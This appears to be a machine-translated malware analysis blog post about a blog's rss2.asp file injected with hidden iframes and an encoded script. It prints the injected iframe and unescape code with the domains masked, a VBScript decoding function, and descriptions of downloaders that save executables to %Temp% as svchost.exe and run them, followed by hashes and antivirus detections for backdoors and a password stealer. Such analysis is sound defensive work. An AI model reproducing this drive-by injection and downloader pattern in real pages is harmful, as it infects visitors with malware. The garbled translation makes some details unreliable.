03-31/rss2.asp of a blog network pushes 5 viruses (three of them are gray pigeons) version 3rd

EndurerOriginal

3Supplement the reaction of rising
2Added Kaspersky's response
1Version

This blog's rss2.asp contains the Code:
/---
<SCRIPT> var words = "% * 3 * CHT * ml % 3E % 3 ciframe SRC % 3d % 22 hxxp % 3A % 2f % 2 fkmx % 2e ** ZL ** F * j ** J % 2 ECOM % 2 findex % 2 ehtm % 22 name % 3d % 22zhu % 22 width % 3d % 220% 22 height % 3d % 220% 22 frameborder % 3d % 220% 22% 3E % 3C % 2 fhtml % 3E % 0d % 0a % 0d % 0a % 0d % 0a "; document. write (words SCAPE (words) </SCRIPT> <IFRAME src = "hxxp: // zhang8 ** 5*9 **. g ** o * 1 *** .icpcn.com/index.htm "width =" 0 "Height =" 0 "scrolling =" no "frameborder =" 0 "> </iframe>
<IFRAME src = "hxxp: // zhang8 ** 5*9 **. g ** o * 1 *** .icpcn.com/ndex.htm "width =" 0 "Height =" 0 "scrolling =" no "frameborder =" 0 "> </iframe> <IFRAME src = "hxxp: // zhang8 ** 5*9 **. g ** o * 1 *** .icpcn.com/index.htm "width =" 0 "Height =" 0 "scrolling =" no "frameborder =" 0 "> </iframe>
<IFRAME src = "hxxp: // zhang8 ** 5*9 **. g ** o * 1 *** .icpcn.com/ndex.htm "width =" 0 "Height =" 0 "scrolling =" no "frameborder =" 0 "> </iframe>
---/

The decrypted value of the variable words is as follows:
/---
<HTML> <IFRAME src = "hxxp: // K *** M *** x *. Z *** l ** F *** J * j.com/index.htm "name =" zhu "width =" 0 "Height =" 0 "frameborder =" 0 "> "; Document. write (words SCAPE (words) </SCRIPT> <SCRIPT> var words = "<HTML> <IFRAME src =" hxxp: // K *** M *** x *. Z *** l ** F *** J * j.com/index.htm "name =" zhu "width =" 0 "Height =" 0 "frameborder =" 0 "> ---/

Hxxp: // K *** M ***. Z *** l *** F *** J * j.com/index.htmCode included:
/---
<IFRAME src = "hxxp: // www. M ** H ** 5 ** 5 **. CN/g ***** Z ****. htm "width =" 0 "Height =" 0 "frameborder =" 0 "> </iframe>
<IFRAME src = "hxxp: // K *** M *** x *. Z *** l ** F *** J * j.com/jb.htm "width =" 0 "Height =" 0 "frameborder =" 0 "> </iframe>
<IFRAME src = "hxxp: // www. Z *** l ** F *** J * j.com/321.htm "width =" 0 "Height =" 0 "frameborder =" 0 "> </iframe>
<IFRAME src = "hxxp: // www. Z *** l ** F *** J * j.com/123.htm "width =" 0 "Height =" 0 "frameborder =" 0 "> </iframe>
---/

Hxxp: // www. M ** H ** 5 ** 5 **. CN/g ***** Z ****. htmThe script code function in is to use Unescape () to decode string values and output them.

The output content is a VBSCRIPT script. The function is to use a custom function:
/---
Function rechange (k)
S = Split (k ,",")
T = ""
For I = 0 to ubound (s)
T = T + CHR (eval (S (I )))
Next
Rechange = T
End Function
---/
Decrypt the value of variable t and execute it.

The tvalue of the decrypted variable is the VBScript code. The function is to use Microsoft. XMLHTTP and scripting. fileSystemObject: download the file gz.exe and save it as % Temp %/leren. BAT, and use shell. use the ShellExecute method of the Application Object Q.

File description:D:/test/gz.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 12:41:59
Modification time: 12:41:59
Access time:
Size: 387584 bytes, 378.512 KB
MD5: 8b1e57e69f958e004fc743188e4f63c4

Kaspersky reportsBackdoor. win32.hupigon. emkKLAB-1900585

RisingBackdoor. gpigeon. SBI(Virus report email analysis result-streamline Ticket No.: 6239851)

We will solve this problem in the newer version 19.16.42 (version 18.72.42 of Rising Star 2006). Please upgrade your Rising Star software to version 19.16.42 (version 18.72.42 of Rising Star 2006) and enable the monitoring center to completely eliminate viruses. If a problem is found during the test, we will postpone the upgrade from version 1 to version 2.

Hxxp: // K *** M *** x *. Z *** l *** F *** J * j.com/jb.htm(Kabbah:Trojan-Downloader.VBS.Small.dcThe content is the VBScript code, and the function is to output information: "Hello, the page you are visiting is loading... please wait .... and Microsoft. XMLHTTP and scripting. fileSystemObject downloads the jb.exe file, saves it as % Temp %/svchost.exe, and uses shell. the Application Object zhonghuae's ShellExecute method to run.

File description:D:/test/jb.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 12:39:38
Modification time: 12:39:40
Access time:
Size: 5632 bytes, 5.512 KB
MD5: ee5a215b736b733ec2caed16fb413a29

Kaspersky reportsTrojan. win32.agent. AICKLAB-1900058

RisingTrojan. mnless. HPG(Virus report email analysis result-streamline Ticket No.: 6239566)

Hxxp: // www. Z *** L * f *** J * j.com/321.htmThe content is the VBScript code. The function is to output information: "Hello, the page you are visiting is loading... please wait .... and Microsoft. XMLHTTP and scripting. fileSystemObject downloads the file 321.exe, saves it as % Temp %/svchost.exe, and uses shell. the Application Object zhonghuae's ShellExecute method to run.

File description:D:/test/321.exe
Attribute: ---
Language: English (USA)
File version: 5.2.20.0.1830
Description: generic host process for Win32 services
Copyright: (c) Microsoft Corporation. All rights reserved.
Note:
Product Version: 5.2.20.0.1830
Product Name: Microsoft (r) Windows (r) Operating System
Company Name: Microsoft Corporation
Legal trademark:
Internal name: rpcs.exe
Source File Name: rpcs.exe
Creation Time: 12:39:38
Modification time: 12:41:12
Access time:
Size: 109606 bytes, 107.38 KB
MD5: 9adeac121907c9ea7ad2b1dad7834bc6

Kaspersky reportsTrojan-PSW.Win32.QQRob.km

RisingTrojan. psw. qqrobber. BKV(Virus report email analysis result-streamline Ticket No.: 6239566)

Hxxp: // www. Z *** L * f *** J * j.com/123.htmThe content is the VBScript code. The function is to output information: "Hello, the page you are visiting is loading... please wait .... and Microsoft. XMLHTTP and scripting. fileSystemObject downloads the 123.exefile, saves it as % Temp %/svchost.exe, and uses shell. the Application Object zhonghuae's ShellExecute method to run.

File description:D:/test/123.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 12:39:38
Modification time: 12:43:34
Access time:
Size: 298121 bytes, 291.137 KB
MD5: b6b5bd850c28a1843fc5195fa09d52c7

Kaspersky reportsBackdoor. win32.hupigon. CRXKLAB-1900585

RisingTrojan. mnless. HPF(Virus report email analysis result-streamline Ticket No.: 6239566)

Hxxp: // zhang8 ** 5*9 **. g ** o ** 1 *** .icpcn.com/index.htm(Rising news:Trojan. DL. vbs. Agent. CLGThe content is Javascript script code. The function is to use string. fromcharcode () to decode the value of variable t and output it.

The value of the decoded variable t is the VBScript code. The function is to use Microsoft. XMLHTTP and scripting. fileSystemObject downloads the file 010.exe, saves it as % Temp %/svchost.exe, and uses shell. run the ShellExecute method of the Application Object Xe.

File description:D:/test/010.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 413184 bytes, 403.512 KB
MD5: 8181fd58e26227d57915fa25ce26234e

Kaspersky reportsBackdoor. win32.hupigon. AVGKLAB-1900585

RisingBackdoor. gpigeon. SBG(Virus report email analysis result-streamline Ticket No.: 6239423)